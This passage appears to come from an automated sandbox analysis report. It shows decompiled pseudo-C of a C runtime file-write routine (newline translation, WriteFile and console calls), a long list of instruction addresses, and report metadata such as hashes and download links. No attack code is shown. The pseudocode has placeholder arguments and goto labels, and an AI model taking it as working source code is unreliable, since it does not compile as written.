										r8d = _t254;
										r8d = r8d - _t208;
										_t261 =  *(_t326 + 0x50);
										 *(_t326 + 0x44) = r15d;
										_t349 =  *(_t326 + 0x60);
										_t281 =  *((intOrPtr*)(_t349 +  *((intOrPtr*)(0x67719900 + _t261 * 8))));
										_t209 = WriteFile(??, ??, ??, ??, ??);
										__eflags = _t209;
										if(_t209 == 0) {
											goto L47;
										}
										_t249 = _t249 +  *(_t326 + 0x48);
										_t261 =  *(_t326 + 0x48);
										__eflags = _t261 - _t318 - _t323 + 0x620;
										if(_t261 < _t318 - _t323 + 0x620) {
											goto L90;
										}
										_t246 = 0xd;
										__eflags = r12d - r13d - r14d;
									} while (r12d - r13d < r14d);
									goto L90;
								}
								__eflags = r14d;
								if(r14d == 0) {
									goto L98;
								}
								_t112 = _t275 + 0xd; // 0xd
								_t247 = _t112;
								do {
									r15d =  *(_t326 + 0x44);
									_t320 = _t323 + 0x620;
									_t240 = 0;
									__eflags = 0;
									do {
										_t213 = r12d - r13d;
										__eflags = _t213 - r14d;
										if(_t213 >= r14d) {
											break;
										}
										_t213 =  *_t341;
										_t341 =  &(_t341[0]);
										__eflags = _t213 - 0xa;
										if(_t213 == 0xa) {
											 *_t320 = _t247;
											r15d = r15d + 1;
											_t320 =  &(_t320[0]);
											_t281 = _t281 + 1;
											__eflags = _t281;
										}
										_t281 = _t281 + 1;
										 *_t320 = _t213;
										_t320 =  &(_t320[0]);
										__eflags = _t281 - 0x13ff;
									} while (_t281 < 0x13ff);
									 *(_t326 + 0x20) =  *(_t326 + 0x20) & _t275;
									r8d = _t254;
									r8d = r8d - _t213;
									_t261 =  *(_t326 + 0x50);
									 *(_t326 + 0x44) = r15d;
									_t349 =  *(_t326 + 0x60);
									_t281 =  *((intOrPtr*)(_t349 +  *((intOrPtr*)(0x67719900 + _t261 * 8))));
									_t214 = WriteFile(??, ??, ??, ??, ??);
									__eflags = _t214;
									if(_t214 == 0) {
										goto L47;
									}
									_t249 = _t249 +  *(_t326 + 0x48);
									_t261 =  *(_t326 + 0x48);
									__eflags = _t261 - _t320 - _t323 + 0x620;
									if(_t261 < _t320 - _t323 + 0x620) {
										goto L90;
									}
									_t247 = 0xd;
									__eflags = r12d - r13d - r14d;
								} while (r12d - r13d < r14d);
								goto L90;
							} else {
								_t271 =  *((intOrPtr*)(0x67719900 + _t339 * 8));
								__eflags =  *(_t349 + 0x67719908) & 0x00000080;
								if(__eflags == 0) {
									goto L49;
								}
								E67708E40(_t240, __eflags, _t271, _t278, _t316, _t328);
								_t304 = _t326 + 0x5c;
								_t261 = 0x67719900;
								__eflags =  *( *((intOrPtr*)(_t271 + 0xc0)) + 0x14);
								_t239 = 0 |  *( *((intOrPtr*)(_t271 + 0xc0)) + 0x14) == 0x00000000;
								_t218 = GetConsoleMode(??, ??);
								__eflags = _t218;
								if(_t218 == 0) {
									goto L49;
								}
								__eflags = _t239;
								if(_t239 == 0) {
									L15:
									_t219 = GetConsoleCP();
									 *(_t326 + 0x58) =  *(_t326 + 0x58) & _t249;
									_t277 = _t343;
									 *(_t326 + 0x5c) = _t219;
									__eflags = r14d;
									if(r14d == 0) {
										_t237 =  *(_t326 + 0x4c);
										L91:
										__eflags = _t237;
										if(_t237 == 0) {
											L98:
											_t263 =  *((intOrPtr*)(0x67719900 +  *(_t326 + 0x50) * 8));
											__eflags =  *( &(_t263[2]) + _t349) & 0x00000040;
											if(( *( &(_t263[2]) + _t349) & 0x00000040) == 0) {
												L100:
												E6770851C(_t263);
												 *_t263 = 0x1c;
												E6770853C(_t263);
												 *_t263 =  *_t263 & 0x00000000;
												L4:
												L102:
												return E67706F80(_t240,  *(_t323 + 0x1a20) ^ _t326);
											}
											__eflags =  *_t343 - 0x1a;
											if( *_t343 == 0x1a) {
												goto L1;
											}
											goto L100;
										}
										__eflags = _t237 - 5;
										if(_t237 != 5) {
											_t240 = _t237;
											_t188 = E6770855C(_t237, _t261);
										} else {
											E6770851C(_t261);
											 *_t261 = 9;
											_t188 = E6770853C(_t261);
											 *_t261 = _t237;
										}
										goto L4;
									} else {
										goto L16;
									}
									while(1) {
										L16:
										__eflags = sil;
										if(sil != 0) {
											goto L32;
										}
										_t240 =  *_t277;
										__eflags = _t240 - 0xa;
										 *(_t326 + 0x4c) = 0 | _t240 == 0x0000000a;
										_t261 = 0x67719900;
										_t308 =  *((intOrPtr*)(0x67719900 + _t339 * 8));
										__eflags =  *(_t349 + _t308 + 0x50);
										if( *(_t349 + _t308 + 0x50) == 0) {
											_t226 = E6770B1F0(_t240, 0x67719900, _t336);
											__eflags = _t226;
											if(_t226 == 0) {
												r8d = 1;
												_t309 = _t277;
												L24:
												_t227 = E6770E9AC(_t254, _t277, _t326 + 0x40, _t309, _t314, _t316, _t328, _t330, _t339);
												__eflags = _t227 - 0xffffffff;
												if(_t227 == 0xffffffff) {
													L46:
													_t237 =  *(_t326 + 0x4c);
													L90:
													__eflags = _t249;
													if(_t249 != 0) {
														__eflags = _t249 -  *(_t326 + 0x44);
														goto L102;
													}
													goto L91;
												}
												L25:
												 *(_t326 + 0x38) =  *(_t326 + 0x38) & 0x00000000;
												 *(_t326 + 0x30) =  *(_t326 + 0x30) & 0x00000000;
												_t240 =  *(_t326 + 0x5c);
												_t261 = _t326 + 0x60;
												_t328 = _t326 + 0x40;
												r9d = 1;
												 *((intOrPtr*)(_t326 + 0x28)) = 5;
												_t277 =  &(_t277[0]);
												 *(_t326 + 0x20) = _t261;
												_t228 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
												r12d = _t228;
												__eflags = _t228;
												if(_t228 == 0) {
													goto L46;
												}
												 *(_t326 + 0x20) =  *(_t326 + 0x20) & 0x00000000;
												_t261 = 0x67719900;
												_t330 = _t326 + 0x58;
												r8d = r12d;
												_t229 = WriteFile(??, ??, ??, ??, ??);
												__eflags = _t229;
												if(_t229 == 0) {
													L47:
													_t237 = GetLastError();
													goto L90;
												}
												_t249 = _t239 - r13d +  *(_t326 + 0x44);
												__eflags =  *(_t326 + 0x58) - r12d;
												if( *(_t326 + 0x58) < r12d) {
													goto L46;
												}
												__eflags =  *(_t326 + 0x4c);
												_t339 =  *(_t326 + 0x50);
												if( *(_t326 + 0x4c) == 0) {
													L43:
													__eflags = _t239 - r13d - r14d;
													if(_t239 - r13d >= r14d) {
														goto L46;
													}
													continue;
												}
												 *(_t326 + 0x20) =  *(_t326 + 0x20) & 0x00000000;
												_t261 = 0x67719900;
												 *(_t326 + 0x60) = 0xd;
												_t330 = _t326 + 0x58;
												r8d = 1;
												_t230 = WriteFile(??, ??, ??, ??, ??);
												__eflags = _t230;
												if(_t230 == 0) {
													goto L47;
												}
												__eflags =  *(_t326 + 0x58) - 1;
												if( *(_t326 + 0x58) < 1) {
													goto L46;
												}
												 *(_t326 + 0x44) =  *(_t326 + 0x44) + 1;
												_t249 = _t249 + 1;
												goto L43;
											}
											_t261 = _t345 - _t277 + _t343;
											__eflags = _t261 - 1;
											if(_t261 <= 1) {
												_t249 = _t249 + 1;
												__eflags = _t249;
												 *((char*)(_t349 +  *((intOrPtr*)(0x67719900 + _t339 * 8)) + 0x4c)) =  *_t277;
												_t261 =  *((intOrPtr*)(0x67719900 + _t339 * 8));
												 *(_t349 + _t261 + 0x50) = 1;
												goto L46;
											}
											r8d = 2;
											_t232 = E6770E9AC(_t254, _t277, _t326 + 0x40, _t277, _t314, _t316, _t328, _t330, _t339);
											__eflags = _t232 - 0xffffffff;
											if(_t232 == 0xffffffff) {
												goto L46;
											}
											_t277 =  &(_t277[0]);
											goto L25;
										}
										 *(_t326 + 0x61) = _t240;
										r8d = 2;
										 *(_t326 + 0x60) =  *((intOrPtr*)(_t349 + _t308 + 0x4c));
										 *(_t349 + _t308 + 0x50) =  *(_t349 + _t308 + 0x50) & 0x00000000;
										_t309 = _t326 + 0x60;
										goto L24;
										L32:
										__eflags = sil - 1;
										if(sil == 1) {
											L34:
											_t220 =  *_t277 & 0x0000ffff;
											r12d = 0;
											__eflags = _t220 - 0xa;
											 *(_t326 + 0x40) = _t220;
											r12b = _t220 == 0xa;
											_t277 =  &(_t277[1]);
											 *(_t326 + 0x4c) = r12d;
											L36:
											__eflags = sil - 1;
											if(sil == 1) {
												L38:
												_t240 =  *(_t326 + 0x40) & 0x0000ffff;
												_t221 = E6770FC6C( *(_t326 + 0x40) & 0x0000ffff);
												__eflags = _t221 -  *(_t326 + 0x40);
												if(_t221 !=  *(_t326 + 0x40)) {
													goto L47;
												}
												_t249 = _t249 + 2;
												__eflags = r12d;
												if(r12d == 0) {
													L42:
													_t339 =  *(_t326 + 0x50);
													goto L43;
												}
												r12d = 0xd;
												_t240 = r12d;
												 *(_t326 + 0x40) = r12w;
												_t234 = E6770FC6C(r12d);
												__eflags = _t234 -  *(_t326 + 0x40);
												if(_t234 !=  *(_t326 + 0x40)) {
													goto L47;
												}
												_t249 = _t249 + 1;
												_t93 = _t326 + 0x44;
												 *_t93 =  *(_t326 + 0x44) + 1;
												__eflags =  *_t93;
												goto L42;
											}
											__eflags = sil - 2;
											if(sil != 2) {
												goto L42;
											}
											goto L38;
										}
										__eflags = sil - 2;
										if(sil != 2) {
											r12d =  *(_t326 + 0x4c);
											goto L36;
										}
										goto L34;
									}
								}
								__eflags = sil;
								if(sil == 0) {
									goto L49;
								}
								goto L15;
							}
						}
						__eflags = sil - 1;
						if(sil != 1) {
							goto L8;
						}
						goto L7;
					}
					L3:
					E6770853C(_t260);
					 *_t260 =  *_t260 & _t249;
					__eflags =  *_t260;
					E6770851C(_t260);
					 *_t260 = 0x16;
					E67709254();
					goto L4;
				}
				L1:
				goto L102;
			}
































































                                                                                                                                                  0x6770daec
                                                                                                                                                  0x6770daec
                                                                                                                                                  0x6770daec
                                                                                                                                                  0x6770daec
                                                                                                                                                  0x6770daec
                                                                                                                                                  0x6770daec
                                                                                                                                                  0x6770daec
                                                                                                                                                  0x6770daec
                                                                                                                                                  0x6770daec
                                                                                                                                                  0x6770daf2
                                                                                                                                                  0x6770daf3
                                                                                                                                                  0x6770daf8
                                                                                                                                                  0x6770dafc
                                                                                                                                                  0x6770db09
                                                                                                                                                  0x6770db0e
                                                                                                                                                  0x6770db11
                                                                                                                                                  0x6770db18
                                                                                                                                                  0x6770db1b
                                                                                                                                                  0x6770db22
                                                                                                                                                  0x6770db24
                                                                                                                                                  0x6770db27
                                                                                                                                                  0x6770db2a
                                                                                                                                                  0x6770db2e
                                                                                                                                                  0x6770db34
                                                                                                                                                  0x6770db3d
                                                                                                                                                  0x6770db40
                                                                                                                                                  0x6770db67
                                                                                                                                                  0x6770db6e
                                                                                                                                                  0x6770db72
                                                                                                                                                  0x6770db76
                                                                                                                                                  0x6770db7a
                                                                                                                                                  0x6770db7f
                                                                                                                                                  0x6770db83
                                                                                                                                                  0x6770db88
                                                                                                                                                  0x6770db8d
                                                                                                                                                  0x6770db90
                                                                                                                                                  0x6770db93
                                                                                                                                                  0x6770db97
                                                                                                                                                  0x6770db9f
                                                                                                                                                  0x6770dba2
                                                                                                                                                  0x6770dba4
                                                                                                                                                  0x6770dba6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dba8
                                                                                                                                                  0x6770dba8
                                                                                                                                                  0x6770dbae
                                                                                                                                                  0x6770dbb0
                                                                                                                                                  0x6770dbb0
                                                                                                                                                  0x6770dbb4
                                                                                                                                                  0x6770dbb4
                                                                                                                                                  0x6770dbb8
                                                                                                                                                  0x6770dbb8
                                                                                                                                                  0x6770dbbd
                                                                                                                                                  0x6770dbbf
                                                                                                                                                  0x6770dbc4
                                                                                                                                                  0x6770dbc6
                                                                                                                                                  0x6770de96
                                                                                                                                                  0x6770de96
                                                                                                                                                  0x6770de9d
                                                                                                                                                  0x6770dea1
                                                                                                                                                  0x6770dea7
                                                                                                                                                  0x6770e1af
                                                                                                                                                  0x6770e1b9
                                                                                                                                                  0x6770e1bf
                                                                                                                                                  0x6770e1c5
                                                                                                                                                  0x6770e1c7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e1cd
                                                                                                                                                  0x6770e1d1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e1d1
                                                                                                                                                  0x6770dead
                                                                                                                                                  0x6770deaf
                                                                                                                                                  0x6770deb2
                                                                                                                                                  0x6770deb5
                                                                                                                                                  0x6770df86
                                                                                                                                                  0x6770df8a
                                                                                                                                                  0x6770e068
                                                                                                                                                  0x6770e06b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e071
                                                                                                                                                  0x6770e077
                                                                                                                                                  0x6770e077
                                                                                                                                                  0x6770e07c
                                                                                                                                                  0x6770e07e
                                                                                                                                                  0x6770e081
                                                                                                                                                  0x6770e084
                                                                                                                                                  0x6770e087
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e089
                                                                                                                                                  0x6770e08e
                                                                                                                                                  0x6770e092
                                                                                                                                                  0x6770e096
                                                                                                                                                  0x6770e098
                                                                                                                                                  0x6770e09c
                                                                                                                                                  0x6770e0a0
                                                                                                                                                  0x6770e0a0
                                                                                                                                                  0x6770e0a0
                                                                                                                                                  0x6770e0a4
                                                                                                                                                  0x6770e0a8
                                                                                                                                                  0x6770e0ab
                                                                                                                                                  0x6770e0af
                                                                                                                                                  0x6770e0af
                                                                                                                                                  0x6770e0b8
                                                                                                                                                  0x6770e0be
                                                                                                                                                  0x6770e0d0
                                                                                                                                                  0x6770e0d8
                                                                                                                                                  0x6770e0da
                                                                                                                                                  0x6770e0df
                                                                                                                                                  0x6770e0e6
                                                                                                                                                  0x6770e0e9
                                                                                                                                                  0x6770e0f0
                                                                                                                                                  0x6770e0f5
                                                                                                                                                  0x6770e0fb
                                                                                                                                                  0x6770e0fe
                                                                                                                                                  0x6770e100
                                                                                                                                                  0x6770e1a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e1a7
                                                                                                                                                  0x6770e106
                                                                                                                                                  0x6770e106
                                                                                                                                                  0x6770e108
                                                                                                                                                  0x6770e10d
                                                                                                                                                  0x6770e116
                                                                                                                                                  0x6770e11e
                                                                                                                                                  0x6770e12c
                                                                                                                                                  0x6770e13a
                                                                                                                                                  0x6770e13d
                                                                                                                                                  0x6770e143
                                                                                                                                                  0x6770e145
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e147
                                                                                                                                                  0x6770e14b
                                                                                                                                                  0x6770e14e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e15a
                                                                                                                                                  0x6770e15a
                                                                                                                                                  0x6770e15d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e15d
                                                                                                                                                  0x6770e158
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e15f
                                                                                                                                                  0x6770e162
                                                                                                                                                  0x6770e168
                                                                                                                                                  0x6770e16b
                                                                                                                                                  0x6770e16b
                                                                                                                                                  0x6770e174
                                                                                                                                                  0x6770e174
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e174
                                                                                                                                                  0x6770df90
                                                                                                                                                  0x6770df93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770df99
                                                                                                                                                  0x6770df9e
                                                                                                                                                  0x6770df9e
                                                                                                                                                  0x6770dfa3
                                                                                                                                                  0x6770dfaa
                                                                                                                                                  0x6770dfaa
                                                                                                                                                  0x6770dfac
                                                                                                                                                  0x6770dfaf
                                                                                                                                                  0x6770dfb2
                                                                                                                                                  0x6770dfb5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dfb7
                                                                                                                                                  0x6770dfbc
                                                                                                                                                  0x6770dfc0
                                                                                                                                                  0x6770dfc4
                                                                                                                                                  0x6770dfc6
                                                                                                                                                  0x6770dfc9
                                                                                                                                                  0x6770dfcd
                                                                                                                                                  0x6770dfd1
                                                                                                                                                  0x6770dfd1
                                                                                                                                                  0x6770dfd1
                                                                                                                                                  0x6770dfd5
                                                                                                                                                  0x6770dfd9
                                                                                                                                                  0x6770dfdc
                                                                                                                                                  0x6770dfe0
                                                                                                                                                  0x6770dfe0
                                                                                                                                                  0x6770dfe9
                                                                                                                                                  0x6770dff5
                                                                                                                                                  0x6770dff8
                                                                                                                                                  0x6770dffb
                                                                                                                                                  0x6770e00b
                                                                                                                                                  0x6770e010
                                                                                                                                                  0x6770e015
                                                                                                                                                  0x6770e025
                                                                                                                                                  0x6770e02b
                                                                                                                                                  0x6770e02d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e033
                                                                                                                                                  0x6770e041
                                                                                                                                                  0x6770e046
                                                                                                                                                  0x6770e049
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e052
                                                                                                                                                  0x6770e05a
                                                                                                                                                  0x6770e05a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e063
                                                                                                                                                  0x6770debb
                                                                                                                                                  0x6770debe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dec4
                                                                                                                                                  0x6770dec4
                                                                                                                                                  0x6770dec7
                                                                                                                                                  0x6770dec7
                                                                                                                                                  0x6770decc
                                                                                                                                                  0x6770ded3
                                                                                                                                                  0x6770ded3
                                                                                                                                                  0x6770ded5
                                                                                                                                                  0x6770ded8
                                                                                                                                                  0x6770dedb
                                                                                                                                                  0x6770dede
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dee0
                                                                                                                                                  0x6770dee4
                                                                                                                                                  0x6770dee7
                                                                                                                                                  0x6770dee9
                                                                                                                                                  0x6770deeb
                                                                                                                                                  0x6770deed
                                                                                                                                                  0x6770def0
                                                                                                                                                  0x6770def3
                                                                                                                                                  0x6770def3
                                                                                                                                                  0x6770def3
                                                                                                                                                  0x6770def6
                                                                                                                                                  0x6770def9
                                                                                                                                                  0x6770defb
                                                                                                                                                  0x6770defe
                                                                                                                                                  0x6770defe
                                                                                                                                                  0x6770df07
                                                                                                                                                  0x6770df13
                                                                                                                                                  0x6770df16
                                                                                                                                                  0x6770df19
                                                                                                                                                  0x6770df29
                                                                                                                                                  0x6770df2e
                                                                                                                                                  0x6770df33
                                                                                                                                                  0x6770df43
                                                                                                                                                  0x6770df49
                                                                                                                                                  0x6770df4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770df51
                                                                                                                                                  0x6770df5f
                                                                                                                                                  0x6770df64
                                                                                                                                                  0x6770df67
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770df70
                                                                                                                                                  0x6770df78
                                                                                                                                                  0x6770df78
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dbcc
                                                                                                                                                  0x6770dbd3
                                                                                                                                                  0x6770dbd7
                                                                                                                                                  0x6770dbdd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dbe3
                                                                                                                                                  0x6770dbea
                                                                                                                                                  0x6770dbf6
                                                                                                                                                  0x6770dbfd
                                                                                                                                                  0x6770dc08
                                                                                                                                                  0x6770dc0b
                                                                                                                                                  0x6770dc11
                                                                                                                                                  0x6770dc13
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dc19
                                                                                                                                                  0x6770dc1b
                                                                                                                                                  0x6770dc26
                                                                                                                                                  0x6770dc26
                                                                                                                                                  0x6770dc2c
                                                                                                                                                  0x6770dc30
                                                                                                                                                  0x6770dc33
                                                                                                                                                  0x6770dc37
                                                                                                                                                  0x6770dc3a
                                                                                                                                                  0x6770de8d
                                                                                                                                                  0x6770e181
                                                                                                                                                  0x6770e181
                                                                                                                                                  0x6770e183
                                                                                                                                                  0x6770e1e1
                                                                                                                                                  0x6770e1ed
                                                                                                                                                  0x6770e1f1
                                                                                                                                                  0x6770e1f7
                                                                                                                                                  0x6770e204
                                                                                                                                                  0x6770e204
                                                                                                                                                  0x6770e209
                                                                                                                                                  0x6770e20f
                                                                                                                                                  0x6770e214
                                                                                                                                                  0x6770db59
                                                                                                                                                  0x6770e222
                                                                                                                                                  0x6770e24b
                                                                                                                                                  0x6770e24b
                                                                                                                                                  0x6770e1f9
                                                                                                                                                  0x6770e1fe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e1fe
                                                                                                                                                  0x6770e185
                                                                                                                                                  0x6770e188
                                                                                                                                                  0x6770e1d5
                                                                                                                                                  0x6770e1d7
                                                                                                                                                  0x6770e18a
                                                                                                                                                  0x6770e18a
                                                                                                                                                  0x6770e18f
                                                                                                                                                  0x6770e195
                                                                                                                                                  0x6770e19a
                                                                                                                                                  0x6770e19a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dc40
                                                                                                                                                  0x6770dc40
                                                                                                                                                  0x6770dc40
                                                                                                                                                  0x6770dc43
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dc49
                                                                                                                                                  0x6770dc4d
                                                                                                                                                  0x6770dc53
                                                                                                                                                  0x6770dc57
                                                                                                                                                  0x6770dc5e
                                                                                                                                                  0x6770dc62
                                                                                                                                                  0x6770dc68
                                                                                                                                                  0x6770dc8d
                                                                                                                                                  0x6770dc92
                                                                                                                                                  0x6770dc94
                                                                                                                                                  0x6770dcca
                                                                                                                                                  0x6770dcd0
                                                                                                                                                  0x6770dcd3
                                                                                                                                                  0x6770dcd8
                                                                                                                                                  0x6770dcdd
                                                                                                                                                  0x6770dce0
                                                                                                                                                  0x6770de77
                                                                                                                                                  0x6770de77
                                                                                                                                                  0x6770e179
                                                                                                                                                  0x6770e179
                                                                                                                                                  0x6770e17b
                                                                                                                                                  0x6770e21c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e220
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e17b
                                                                                                                                                  0x6770dce6
                                                                                                                                                  0x6770dce6
                                                                                                                                                  0x6770dcec
                                                                                                                                                  0x6770dcf2
                                                                                                                                                  0x6770dcf6
                                                                                                                                                  0x6770dcfb
                                                                                                                                                  0x6770dd00
                                                                                                                                                  0x6770dd08
                                                                                                                                                  0x6770dd10
                                                                                                                                                  0x6770dd13
                                                                                                                                                  0x6770dd18
                                                                                                                                                  0x6770dd1e
                                                                                                                                                  0x6770dd21
                                                                                                                                                  0x6770dd23
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dd2e
                                                                                                                                                  0x6770dd34
                                                                                                                                                  0x6770dd3f
                                                                                                                                                  0x6770dd4d
                                                                                                                                                  0x6770dd50
                                                                                                                                                  0x6770dd56
                                                                                                                                                  0x6770dd58
                                                                                                                                                  0x6770de80
                                                                                                                                                  0x6770de86
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770de86
                                                                                                                                                  0x6770dd63
                                                                                                                                                  0x6770dd67
                                                                                                                                                  0x6770dd6c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dd72
                                                                                                                                                  0x6770dd77
                                                                                                                                                  0x6770dd7c
                                                                                                                                                  0x6770de47
                                                                                                                                                  0x6770de4c
                                                                                                                                                  0x6770de4f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770de51
                                                                                                                                                  0x6770dd82
                                                                                                                                                  0x6770dd88
                                                                                                                                                  0x6770dd8f
                                                                                                                                                  0x6770dd98
                                                                                                                                                  0x6770dda6
                                                                                                                                                  0x6770ddac
                                                                                                                                                  0x6770ddb2
                                                                                                                                                  0x6770ddb4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ddba
                                                                                                                                                  0x6770ddbf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ddc5
                                                                                                                                                  0x6770ddc9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ddc9
                                                                                                                                                  0x6770dc9c
                                                                                                                                                  0x6770dc9f
                                                                                                                                                  0x6770dca3
                                                                                                                                                  0x6770de5f
                                                                                                                                                  0x6770de5f
                                                                                                                                                  0x6770de65
                                                                                                                                                  0x6770de6a
                                                                                                                                                  0x6770de6e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770de6e
                                                                                                                                                  0x6770dcae
                                                                                                                                                  0x6770dcb7
                                                                                                                                                  0x6770dcbc
                                                                                                                                                  0x6770dcbf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dcc5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dcc5
                                                                                                                                                  0x6770dc6f
                                                                                                                                                  0x6770dc73
                                                                                                                                                  0x6770dc79
                                                                                                                                                  0x6770dc7d
                                                                                                                                                  0x6770dc83
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ddcd
                                                                                                                                                  0x6770ddcd
                                                                                                                                                  0x6770ddd1
                                                                                                                                                  0x6770ddd9
                                                                                                                                                  0x6770ddd9
                                                                                                                                                  0x6770dddc
                                                                                                                                                  0x6770dddf
                                                                                                                                                  0x6770dde3
                                                                                                                                                  0x6770dde8
                                                                                                                                                  0x6770ddec
                                                                                                                                                  0x6770ddf0
                                                                                                                                                  0x6770ddfc
                                                                                                                                                  0x6770ddfc
                                                                                                                                                  0x6770de00
                                                                                                                                                  0x6770de08
                                                                                                                                                  0x6770de08
                                                                                                                                                  0x6770de0d
                                                                                                                                                  0x6770de12
                                                                                                                                                  0x6770de17
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770de19
                                                                                                                                                  0x6770de1c
                                                                                                                                                  0x6770de1f
                                                                                                                                                  0x6770de42
                                                                                                                                                  0x6770de42
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770de42
                                                                                                                                                  0x6770de21
                                                                                                                                                  0x6770de27
                                                                                                                                                  0x6770de2a
                                                                                                                                                  0x6770de30
                                                                                                                                                  0x6770de35
                                                                                                                                                  0x6770de3a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770de3c
                                                                                                                                                  0x6770de3e
                                                                                                                                                  0x6770de3e
                                                                                                                                                  0x6770de3e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770de3e
                                                                                                                                                  0x6770de02
                                                                                                                                                  0x6770de06
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770de06
                                                                                                                                                  0x6770ddd3
                                                                                                                                                  0x6770ddd7
                                                                                                                                                  0x6770ddf7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ddf7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ddd7
                                                                                                                                                  0x6770dc40
                                                                                                                                                  0x6770dc1d
                                                                                                                                                  0x6770dc20
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770dc20
                                                                                                                                                  0x6770dbc6
                                                                                                                                                  0x6770db99
                                                                                                                                                  0x6770db9d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770db9d
                                                                                                                                                  0x6770db42
                                                                                                                                                  0x6770db42
                                                                                                                                                  0x6770db47
                                                                                                                                                  0x6770db47
                                                                                                                                                  0x6770db49
                                                                                                                                                  0x6770db4e
                                                                                                                                                  0x6770db54
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770db54
                                                                                                                                                  0x6770db36
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                                                                                                  • String ID: U
                                                                                                                                                  • API String ID: 3902385426-4171548499
                                                                                                                                                  • Opcode ID: 2a18b67176b522393155744e9fa2b2924b2cb040f972c9fdfcc112558997b183
                                                                                                                                                  • Instruction ID: fa6802ba2a8ac910faaba23928be616e2f3650238003278de7a0ba4b74b5c532
                                                                                                                                                  • Opcode Fuzzy Hash: 2a18b67176b522393155744e9fa2b2924b2cb040f972c9fdfcc112558997b183
                                                                                                                                                  • Instruction Fuzzy Hash: 470254B2318B8486EB10CF25E54436AB7B5F3ADB88F644526DB9D47B68DB7DC049CB00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67709650, Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 722COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 56%
